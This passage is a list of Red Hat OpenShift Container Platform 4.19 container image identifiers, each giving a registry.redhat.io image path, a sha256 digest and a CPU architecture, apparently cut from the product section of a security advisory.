"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
